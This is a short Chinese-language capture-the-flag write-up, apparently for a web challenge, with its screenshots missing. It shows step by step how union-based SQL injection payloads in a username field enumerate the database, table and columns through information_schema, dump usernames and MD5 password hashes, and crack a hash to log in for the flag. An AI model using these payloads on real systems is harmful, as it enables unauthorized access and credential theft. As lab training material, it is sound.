进来页面是这样的:
注册页面:
我们就尝试随便注册一个用户,然后登陆发现没啥用:
这里还有一个忘记密码可以点击:
可以猜测这里有没有注入漏洞:
我注册的用户名为1,然后去试试 1’ and 1=1# 以及 1' and 1=2# ,发现是存在注入漏洞的。
然后就去判断字段数以及那个字段是有回显的,1' order by 4# 可以显示,然后-1’ union select 1,2,3,4:
3的位置是回显位置,接下来就是去找数据库名:
-1' union select 1,2,group_concat(schema_name),4 from information_schema.schemata #
数据名为cetc004,接下来是表名:
-1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema="cetc004"#
表名为user,然后是字段:
-1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema="cetc004"#
接下来就是去找用户名和密码了:
-1' union select 1,2,group_concat(username),4 from cetc004.user#
用户名为如图↑
然后是密码:
-1' union select 1,2,group_concat(password),4 from cetc004.user#
如果熟知c4ca4238a0b923820dcc509a6f75849b这个是1做md5加密后的结果就很容易了,不然还要猜测一下,那么我们就把第一个拿去做md5解密:
然后拿这个去登录,就可以得到flag了: